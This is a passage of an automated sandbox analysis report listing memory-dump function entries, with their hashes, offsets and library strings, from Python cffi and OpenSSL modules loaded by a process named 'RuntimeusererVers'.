                                                                                                                                                                                                                                          • Opcode ID: b140d61363fd0dff1f397f187392c31c8497dfb576154a2f6fc7d00117bf2914
                                                                                                                                                                                                                                          • Instruction ID: 65b6d880a67f7bd354cb692cea14f8a444b27056f4b4b66bf512dd9f041c70c6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b140d61363fd0dff1f397f187392c31c8497dfb576154a2f6fc7d00117bf2914
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3B211921F09F4385EB54DB22A958839A3A1AF89FF0F085630DE4F46750EE2CF4B58744
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Long_SignSubtypeType_
                                                                                                                                                                                                                                          • String ID: integer/float conversion failed$integer/float expected
                                                                                                                                                                                                                                          • API String ID: 3148124222-1774177493
                                                                                                                                                                                                                                          • Opcode ID: fa0394812f82a9e9ea30a07d0c7af7266ef641eb2908b4f30ed029beba5d8861
                                                                                                                                                                                                                                          • Instruction ID: 670d1cd6d030d8c6750346419c1e9a4a32e5fd1f78525f793579d6587aa16038
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fa0394812f82a9e9ea30a07d0c7af7266ef641eb2908b4f30ed029beba5d8861
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8D515172B09E42C2EA59AB25DC612B91391BF45BF4F085336FA4E57794DF2CF8918300
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577554084.00007FF81E080000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577633708.00007FF81E0F4000.00000020.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577887521.00007FF81E0F6000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578021546.00007FF81E119000.00000008.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578087716.00007FF81E11D000.00000004.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E11E000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E124000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E12B000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: R_put_error
                                                                                                                                                                                                                                          • String ID: , value=$..\s\ssl\ssl_conf.c$cmd=
                                                                                                                                                                                                                                          • API String ID: 1767461275-2539137415
                                                                                                                                                                                                                                          • Opcode ID: 6f5fa976fdc21c662024ae26816687f03e4be8bcdd26a407f4cb266dff922d12
                                                                                                                                                                                                                                          • Instruction ID: a100eba6d4068b719c7a8c875d5bd27cb08c9ce2067737b5bfac8bf8da81691b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6f5fa976fdc21c662024ae26816687f03e4be8bcdd26a407f4cb266dff922d12
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BE51A172B08A0A82EF648B59E4007B963A0FB84BE4F544635EB4C077D9DF3DF9958700
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Dealloc$Err_FormatTuple_$Pack
                                                                                                                                                                                                                                          • String ID: abi number %d not supported
                                                                                                                                                                                                                                          • API String ID: 3887392137-1298965716
                                                                                                                                                                                                                                          • Opcode ID: 2dabeee60670ceba8e8974d44f08db2ae8858d3a6bccc3b012f40745e4e2c2fe
                                                                                                                                                                                                                                          • Instruction ID: 3f1f9053ce32da51ca8f274d67b9fce695905272b04f1011ef506932c7b5277a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2dabeee60670ceba8e8974d44f08db2ae8858d3a6bccc3b012f40745e4e2c2fe
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A3418C22A15E4285EB199F259C642F827A4FF45BF8F498635DE0E17754DF3CF4418300
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1582033096.00007FF81E4E1000.00000020.00000001.01000000.00000037.sdmp, Offset: 00007FF81E4E0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1581472246.00007FF81E4E0000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582460342.00007FF81E4E7000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582744405.00007FF81E4EC000.00000004.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582953118.00007FF81E4EE000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e4e0000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Arg_Buffer_$ArgumentBufferContiguousKeywordsObject_ReleaseUnpack
                                                                                                                                                                                                                                          • String ID: argument 'key'$contiguous buffer$hmac_new
                                                                                                                                                                                                                                          • API String ID: 3699177490-206859838
                                                                                                                                                                                                                                          • Opcode ID: 754315372aba918daff17f2ef17cfa320ec5591b04e4a443cbeeea477356caac
                                                                                                                                                                                                                                          • Instruction ID: aad7142ef95e6d9f70e9451c79d603ba6b05568100e8b9f7e77f2361d124fbd4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 754315372aba918daff17f2ef17cfa320ec5591b04e4a443cbeeea477356caac
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F2414D22A19F8382EA60CB51E445BA9A3A0FB957F4F444236DE8C07B55EF7CF5A4C740
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Arg_Err_Keywords_ParseSizeStringSubtypeTupleType_
                                                                                                                                                                                                                                          • String ID: Can remove destructor only on a object previously returned by ffi.gc()$O!O|n:gc
                                                                                                                                                                                                                                          • API String ID: 2258746257-2175166513
                                                                                                                                                                                                                                          • Opcode ID: 5b5d3f2258028ee15e0ad0de0815b677d03f1e683889cfd688afb36539bc1e85
                                                                                                                                                                                                                                          • Instruction ID: 8bf918816f5a4c9813351ebfcdf04b049b4ac7cc8b18ab14c4e65934914e1df2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5b5d3f2258028ee15e0ad0de0815b677d03f1e683889cfd688afb36539bc1e85
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 56410436A08F42C2EB44CF65EC641A973A5FB88BE4B540636EA8D43B14DF3DE455C700
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          • initializer for ctype '%s' is correct, but we get an internal mismatch--please report a bug, xrefs: 00007FF81E503C1C
                                                                                                                                                                                                                                          • initializer for ctype '%s' must be a %s, not %.200s, xrefs: 00007FF81E503B5B
                                                                                                                                                                                                                                          • initializer for ctype '%s' must be a %s, not cdata '%s', xrefs: 00007FF81E503BBE
                                                                                                                                                                                                                                          • initializer for ctype '%s' appears indeed to be '%s', but the types are different (check that you are not e.g. mixing up different ffi instances), xrefs: 00007FF81E503BF2
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Err_Format
                                                                                                                                                                                                                                          • String ID: initializer for ctype '%s' appears indeed to be '%s', but the types are different (check that you are not e.g. mixing up different ffi instances)$initializer for ctype '%s' is correct, but we get an internal mismatch--please report a bug$initializer for ctype '%s' must be a %s, not %.200s$initializer for ctype '%s' must be a %s, not cdata '%s'
                                                                                                                                                                                                                                          • API String ID: 376477240-1352286566
                                                                                                                                                                                                                                          • Opcode ID: 6f889116d4a9a4041991b6468120e99f83f13f9ee929452ad63824c3f5e7f8c1
                                                                                                                                                                                                                                          • Instruction ID: 189459072a011c74ea3a0cd043df57173da5b2016b094529be7e038ff6a17ca4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6f889116d4a9a4041991b6468120e99f83f13f9ee929452ad63824c3f5e7f8c1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C3310A75A08E5281EA448B1AED600F86361FB84BE8B984771EA2D473A5EE7DF544C300
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577554084.00007FF81E080000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577633708.00007FF81E0F4000.00000020.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577887521.00007FF81E0F6000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578021546.00007FF81E119000.00000008.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578087716.00007FF81E11D000.00000004.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E11E000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E124000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E12B000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: R_put_error$Y_new
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\ssl_rsa.c
                                                                                                                                                                                                                                          • API String ID: 2632022502-2723262194
                                                                                                                                                                                                                                          • Opcode ID: 3fa2f0e6f69a6a838d94406baac50519cd885df6768811c83b1c210ad9617fea
                                                                                                                                                                                                                                          • Instruction ID: ff182334da62c9ebd3c6cae83b65f3c98bc80e2238a271ccf02fbed9da224c64
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3fa2f0e6f69a6a838d94406baac50519cd885df6768811c83b1c210ad9617fea
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0D216225B18A4686EB10EB65E5016F963A1FF897D4F580131EF4C47B86EF2CFD528B00
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Arg_ClearDict_Err_ErrorFormatFreeLastLibraryParseSizeTuple_Unicode___stdio_common_vsprintf
                                                                                                                                                                                                                                          • String ID: closing library '%s': %s$error 0x%x
                                                                                                                                                                                                                                          • API String ID: 3709125606-4000567706
                                                                                                                                                                                                                                          • Opcode ID: 583a14c413a2bca59a83a8793f8d2e196dcc16719ce5cb8e2a6241fde0bf1b44
                                                                                                                                                                                                                                          • Instruction ID: a160183ee30f6c21ef45e3e3f726c5d27ee08d0d363359fca895914cbd375e1c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 583a14c413a2bca59a83a8793f8d2e196dcc16719ce5cb8e2a6241fde0bf1b44
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6821E925A18E8282EB48CB56EDA01A97370FB88BE4B445276DE4E53764DF2DF545C700
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Err_$Occurred$DeallocFormatLong_Object_SignStringUnicode_
                                                                                                                                                                                                                                          • String ID: 32-bit unsigned int$integer %s does not fit '%s'
                                                                                                                                                                                                                                          • API String ID: 198760793-372613038
                                                                                                                                                                                                                                          • Opcode ID: 7a09c0f2bfa9c6e3dfd53c4b396cec4babcdd805c4c34e169051fb952f2fb2fe
                                                                                                                                                                                                                                          • Instruction ID: 5f91e4ec37b5ba460a8f7bba75cc82d9b3e2ef8991e8990b20f4995fcb0ce1bb
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7a09c0f2bfa9c6e3dfd53c4b396cec4babcdd805c4c34e169051fb952f2fb2fe
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 19111F31A09F52C1EE599B56FD641B92390AF88BF0F144235FE5E07755DE2DF4848700
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1578637831.00007FF81E131000.00000020.00000001.01000000.0000003B.sdmp, Offset: 00007FF81E130000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578429679.00007FF81E130000.00000002.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578694735.00007FF81E13D000.00000002.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578785676.00007FF81E14E000.00000004.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578942677.00007FF81E14F000.00000008.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1579030056.00007FF81E154000.00000004.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1579098759.00007FF81E155000.00000002.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e130000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Err_Mem_$FormatFreeMallocMemory
                                                                                                                                                                                                                                          • String ID: protocols longer than %u bytes
                                                                                                                                                                                                                                          • API String ID: 2903777688-895981740
                                                                                                                                                                                                                                          • Opcode ID: d9916402d9a81dbbda80e8b467c0f7359cd56887bd91c1c9543ed264e22cc5f4
                                                                                                                                                                                                                                          • Instruction ID: 1abfff73b06cfb099cf236b5987056a31a1181b35c4387b7c0d981370ee257e1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d9916402d9a81dbbda80e8b467c0f7359cd56887bd91c1c9543ed264e22cc5f4
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F81104A5A08E0282FB149F26E84002823B0FB88FF6B505A35CE2E47764DF38F4A48340
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Err_$Occurred$DeallocFormatObject_Unicode_
                                                                                                                                                                                                                                          • String ID: 32-bit int$integer %s does not fit '%s'
                                                                                                                                                                                                                                          • API String ID: 4129581467-810487915
                                                                                                                                                                                                                                          • Opcode ID: 85a9b7ad18267aaae14f9e93c918057033f0eba280644ca24943afeab3ccf243
                                                                                                                                                                                                                                          • Instruction ID: 956e4ad8bb608c42e51116c56e226fe12daa0d98ca2e81f37e1ca499fff91480
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 85a9b7ad18267aaae14f9e93c918057033f0eba280644ca24943afeab3ccf243
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 14011B21B09E4282EE599B69EC682F96290AF49BF4F144339E91D47795EE2DF4848301
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Err_$Occurred$DeallocFormatLong_Object_SignStringUnicode_
                                                                                                                                                                                                                                          • String ID: 8-bit unsigned int$integer %s does not fit '%s'
                                                                                                                                                                                                                                          • API String ID: 198760793-3731599500
                                                                                                                                                                                                                                          • Opcode ID: 586e460f31288d9cd292830d2669236e911567906b0437cab734378a3cf820f1
                                                                                                                                                                                                                                          • Instruction ID: b6e7e46d0742134dae77a33dc9cab73deb1f8df1ea07aec7bd1bd633901fea9b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 586e460f31288d9cd292830d2669236e911567906b0437cab734378a3cf820f1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CF014031B09F02C1EE599B65FC642F823A0AF48BF0F144234E91D077A1DE6DF4848300
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Value$ErrorFatalFuncThread_acquire_lockThread_release_lockfree
                                                                                                                                                                                                                                          • String ID: cffi: ThreadCanaryObj is already a zombie$thread_canary_make_zombie
                                                                                                                                                                                                                                          • API String ID: 613121950-1133694477
                                                                                                                                                                                                                                          • Opcode ID: 6462cbfaeb62c15b4c6bb369a1ff4d91f373138c353548cc89dcfc1122ff781c
                                                                                                                                                                                                                                          • Instruction ID: 97b4edffc29c045d8c6d8fdd8456e0e554e41531ff8d6f847f166c67785283f3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6462cbfaeb62c15b4c6bb369a1ff4d91f373138c353548cc89dcfc1122ff781c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7C11B471A09E06C2EA1C8B64ECA43B433A1EF88BE5F140235D51E463A0EF7DF545C281
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Err_$Occurred$DeallocFormatLong_Object_SignStringUnicode_
                                                                                                                                                                                                                                          • String ID: 16-bit unsigned int$integer %s does not fit '%s'
                                                                                                                                                                                                                                          • API String ID: 198760793-331574723
                                                                                                                                                                                                                                          • Opcode ID: ab4b5e2506e50060bd6d35f5a85d4838c88a24ba5276331cbff74327f6e2efa5
                                                                                                                                                                                                                                          • Instruction ID: 82e4cd6e2564f57adb4c95070252db2b90e1243e5af93440241805c01567161f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ab4b5e2506e50060bd6d35f5a85d4838c88a24ba5276331cbff74327f6e2efa5
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 90011E25A09E0282EE599B69FC642B822A0AF49BF4F144634E91E07761EE2DF4448300
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
